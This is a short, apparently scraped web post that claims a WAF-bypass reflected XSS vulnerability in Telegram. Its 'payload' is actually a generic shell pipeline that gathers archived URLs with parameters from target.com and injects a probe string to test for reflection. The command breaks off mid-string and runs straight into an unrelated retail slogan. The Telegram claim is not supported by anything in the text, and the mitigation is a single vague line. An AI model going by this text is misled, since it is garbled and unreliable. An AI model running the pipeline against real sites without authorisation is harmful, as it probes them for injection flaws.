WAF bypass XSS Vulnerability in TelegramReflected cross-site scripting (or X

1. WAF bypass XSS Vulnerability in Telegram
2.  
3. Reflected cross-site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.
4.  
5. Payload: echo https://target.com | waybackurls | grep "=" | egrep -iv".(jpg|jpeg|gif|css|tif|woff|woff2|icon|pdf|svg|txt|js)" | uro | qsreplace">'|freq Target: Expect More. Pay Less.
6.  
7. Mitigation
8. Update to latest version of Telegram
9.  
10.